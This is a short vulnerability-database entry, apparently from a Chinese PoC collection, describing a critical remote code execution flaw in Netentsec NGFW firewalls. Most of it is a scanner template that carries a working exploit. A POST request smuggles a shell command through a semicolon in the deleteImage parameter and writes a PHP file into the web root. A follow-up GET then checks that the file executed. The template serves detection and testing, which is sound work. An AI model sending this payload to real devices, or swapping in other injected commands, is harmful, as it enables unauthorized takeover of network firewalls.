netentsec-ngfw-rce: Netentsec Ngfw RCE

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Netentsec Ngfw RCE

PoC代码[已公开]

id: netentsec-ngfw-rce

info:
  name: Netentsec Ngfw RCE
  author: YekkoY
  severity: critical
  verified: true
  description: |-
    Netentsec Ngfw RCE
  tags: netentsec,rce,网康,firewall
  created: 2025/03/19

set:
  r2: randomLowercase(10)
rules:
  r0:
    request:
      method: POST
      path: /directdata/direct/router
      body: |
        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5({{r2}});unlink(__FILE__);?>' >/var/www/html/{{r2}}.php"]}],"type":"rpc","tid":17}
    expression: response.status == 200 && response.body.bcontains(b"SSLVPN_Resource") && response.body.bcontains(b"\"result\":{\"success\":true}")
  r1:
    request:
      method: GET
      path: /{{r2}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(md5(r2)))
expression: r0() && r1()